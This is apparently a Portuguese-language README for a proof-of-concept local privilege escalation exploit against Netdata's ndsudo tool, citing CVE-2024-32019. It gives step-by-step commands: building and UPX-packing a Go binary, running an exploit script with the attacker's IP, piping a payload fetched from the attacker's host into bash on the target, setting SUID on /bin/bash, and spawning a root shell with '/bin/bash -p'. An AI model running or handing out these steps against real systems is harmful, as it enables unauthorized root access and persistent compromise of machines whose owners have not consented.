
Netdata ndsudo PoC
Netdata ndsudo PoC
Compile o binário:
go build -ldflags "-s -w" -o nvme poc.go
upx nvme
Execute o script bash:
bash exploit.sh <YOUR IP>
Na máquina alvo, execute em um diretório gravável:
curl http://<YOUT IP>:8000/payload.sh | bash
Ele baixará automaticamente o binário nvme, exportará o caminho, executará o ndsudo e adicionará SUID ao /bin/bash.
Provavelmente você precisa alterar o caminho do ndsudo no exploit.sh
Para escalar privilégios, basta executar:
/bin/bash -p
O exploit é baseado em https://github.com/AzureADTrent/CVE-2024-32019-POC, quando o testei, tive o erro:
execve: Exec format error
Por isso decidi criar o meu com Go.